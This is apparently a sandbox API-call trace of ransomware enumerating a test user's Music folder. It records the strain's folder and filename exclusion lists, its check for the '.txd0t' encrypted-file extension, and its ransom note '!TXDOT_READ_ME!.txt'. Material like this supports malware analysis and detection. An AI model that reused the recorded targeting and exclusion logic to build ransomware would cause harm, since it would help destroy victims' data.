[0090.232] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.232] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.232] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\appdata\\local\\") returned 0x0 [0090.232] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.232] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.232] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.232] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\boot\\") returned 0x0 [0090.232] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\perflogs\\") returned 0x0 [0090.232] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\programdata\\") returned 0x0 [0090.232] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\drivers\\") returned 0x0 [0090.232] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\wsus\\") returned 0x0 [0090.233] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.233] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.233] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="crypt_detect") returned 0x0 [0090.233] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="cryptolocker") returned 0x0 [0090.233] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="ransomware") returned 0x0 [0090.233] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="C:\\WINDOWS") returned 0x0 [0090.233] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.233] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="C:\\Program Files") returned 0x0 [0090.233] GetProcessHeap () returned 0xe30000 [0090.233] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4e6) returned 0xecc4e0 [0090.233] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0090.233] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", psz2="\\*", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\*") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\*" [0090.233] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\*", lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f1f5210, ftCreationTime.dwHighDateTime=0x1d5ef33, ftLastAccessTime.dwLowDateTime=0x5213e9a4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5213e9a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2430 [0090.233] StrCmpW (psz1=".", psz2=".") returned 0 [0090.233] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f1f5210, ftCreationTime.dwHighDateTime=0x1d5ef33, ftLastAccessTime.dwLowDateTime=0x5213e9a4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5213e9a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.233] StrCmpW (psz1="..", psz2=".") returned 1 [0090.233] StrCmpW (psz1="..", psz2="..") returned 0 [0090.233] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51e8fa97, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51e8fa97, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51fe6f8f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.233] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.233] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.233] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0090.233] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", psz2="\\", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\" [0090.233] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\!TXDOT_READ_ME!.txt" [0090.233] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.233] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.233] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.233] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.233] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.233] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.233] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.234] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.234] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.234] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.234] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.234] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.234] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.234] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.234] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.234] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.234] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d7fdbe0, ftCreationTime.dwHighDateTime=0x1d5e9c7, ftLastAccessTime.dwLowDateTime=0x58ec1a0, ftLastAccessTime.dwHighDateTime=0x1d5eff7, ftLastWriteTime.dwLowDateTime=0x51e69890, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4ee3, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="UMILH6.mp3.txd0t", cAlternateFileName="UMILH6~1.TXD")) returned 1 [0090.234] StrCmpW (psz1="UMILH6.mp3.txd0t", psz2=".") returned 1 [0090.234] StrCmpW (psz1="UMILH6.mp3.txd0t", psz2="..") returned 1 [0090.234] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0090.234] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", psz2="\\", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\" [0090.234] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\", psz2="UMILH6.mp3.txd0t", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3.txd0t" [0090.234] PathFindExtensionW (pszPath="UMILH6.mp3.txd0t") returned=".txd0t" [0090.234] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.234] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2471fa0, ftCreationTime.dwHighDateTime=0x1d5e392, ftLastAccessTime.dwLowDateTime=0xf62b1850, ftLastAccessTime.dwHighDateTime=0x1d5edc4, ftLastWriteTime.dwLowDateTime=0x51e8fa97, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xd0d5, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="v24aCFd5CzBX.mp3.txd0t", cAlternateFileName="V24ACF~1.TXD")) returned 1 [0090.234] StrCmpW (psz1="v24aCFd5CzBX.mp3.txd0t", psz2=".") returned 1 [0090.234] StrCmpW (psz1="v24aCFd5CzBX.mp3.txd0t", psz2="..") returned 1 [0090.234] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0090.234] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", psz2="\\", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\" [0090.234] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\", psz2="v24aCFd5CzBX.mp3.txd0t", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3.txd0t" [0090.234] PathFindExtensionW (pszPath="v24aCFd5CzBX.mp3.txd0t") returned=".txd0t" [0090.234] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.234] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2471fa0, ftCreationTime.dwHighDateTime=0x1d5e392, ftLastAccessTime.dwLowDateTime=0xf62b1850, ftLastAccessTime.dwHighDateTime=0x1d5edc4, ftLastWriteTime.dwLowDateTime=0x51e8fa97, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xd0d5, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="v24aCFd5CzBX.mp3.txd0t", cAlternateFileName="V24ACF~1.TXD")) returned 0 [0090.234] FindClose (in: hFindFile=0xec2430 | out: hFindFile=0xec2430) returned 1 [0090.234] GetProcessHeap () returned 0xe30000 [0090.234] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecc4e0 | out: hHeap=0xe30000) returned 1 [0090.234] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe99d0, ftCreationTime.dwHighDateTime=0x1d5eb78, ftLastAccessTime.dwLowDateTime=0x15050de0, ftLastAccessTime.dwHighDateTime=0x1d5e45a, ftLastWriteTime.dwLowDateTime=0x51fc0eec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x181c7, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="cSnUOnQz6xEd.wav.txd0t", cAlternateFileName="CSNUON~1.TXD")) returned 1 [0090.235] StrCmpW (psz1="cSnUOnQz6xEd.wav.txd0t", psz2=".") returned 1 [0090.235] StrCmpW (psz1="cSnUOnQz6xEd.wav.txd0t", psz2="..") returned 1 [0090.235] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0090.235] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0090.235] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="cSnUOnQz6xEd.wav.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav.txd0t" [0090.235] PathFindExtensionW (pszPath="cSnUOnQz6xEd.wav.txd0t") returned=".txd0t" [0090.235] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.235] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b60a1a0, ftCreationTime.dwHighDateTime=0x1d5e472, ftLastAccessTime.dwLowDateTime=0x387b3280, ftLastAccessTime.dwHighDateTime=0x1d5eca3, ftLastWriteTime.dwLowDateTime=0x51edbf2e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18b82, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="Ftx5O-lqQUv4Qc8fXk.mp3.txd0t", cAlternateFileName="FTX5O-~1.TXD")) returned 1 [0090.235] StrCmpW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3.txd0t", psz2=".") returned 1 [0090.235] StrCmpW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3.txd0t", psz2="..") returned 1 [0090.235] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0090.235] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0090.235] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="Ftx5O-lqQUv4Qc8fXk.mp3.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3.txd0t" [0090.235] PathFindExtensionW (pszPath="Ftx5O-lqQUv4Qc8fXk.mp3.txd0t") returned=".txd0t" [0090.235] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.235] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafa72b10, ftCreationTime.dwHighDateTime=0x1d5eb5a, ftLastAccessTime.dwLowDateTime=0x495be580, ftLastAccessTime.dwHighDateTime=0x1d5ee3e, ftLastWriteTime.dwLowDateTime=0x51fe6f8f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x122cd, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="JKFgwNnPDq3IzeypAX.wav.txd0t", cAlternateFileName="JKFGWN~1.TXD")) returned 1 [0090.235] StrCmpW (psz1="JKFgwNnPDq3IzeypAX.wav.txd0t", psz2=".") returned 1 [0090.235] StrCmpW (psz1="JKFgwNnPDq3IzeypAX.wav.txd0t", psz2="..") returned 1 [0090.235] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0090.235] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0090.235] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="JKFgwNnPDq3IzeypAX.wav.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav.txd0t" [0090.235] PathFindExtensionW (pszPath="JKFgwNnPDq3IzeypAX.wav.txd0t") returned=".txd0t" [0090.235] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.235] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe1171f0, ftCreationTime.dwHighDateTime=0x1d5edb4, ftLastAccessTime.dwLowDateTime=0xd60c0a10, ftLastAccessTime.dwHighDateTime=0x1d5f054, ftLastWriteTime.dwLowDateTime=0x52118433, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x101f9, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="NXIDve2FMxUql9.wav.txd0t", cAlternateFileName="NXIDVE~1.TXD")) returned 1 [0090.235] StrCmpW (psz1="NXIDve2FMxUql9.wav.txd0t", psz2=".") returned 1 [0090.235] StrCmpW (psz1="NXIDve2FMxUql9.wav.txd0t", psz2="..") returned 1 [0090.235] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0090.235] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0090.235] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="NXIDve2FMxUql9.wav.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav.txd0t" [0090.235] PathFindExtensionW (pszPath="NXIDve2FMxUql9.wav.txd0t") returned=".txd0t" [0090.235] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.235] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdece000, ftCreationTime.dwHighDateTime=0x1d5ee36, ftLastAccessTime.dwLowDateTime=0x5255457f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5255457f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="toS-EwE0vCCwoskwD1", cAlternateFileName="TOS-EW~1")) returned 1 [0090.235] StrCmpW (psz1="toS-EwE0vCCwoskwD1", psz2=".") returned 1 [0090.236] StrCmpW (psz1="toS-EwE0vCCwoskwD1", psz2="..") returned 1 [0090.236] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0090.236] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0090.236] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="toS-EwE0vCCwoskwD1", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\windows\\system32\\") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\windows\\system\\") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\appdata\\local\\") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\boot\\") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\perflogs\\") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\programdata\\") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\drivers\\") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\wsus\\") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="crypt_detect") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="cryptolocker") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="ransomware") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="C:\\WINDOWS") returned 0x0 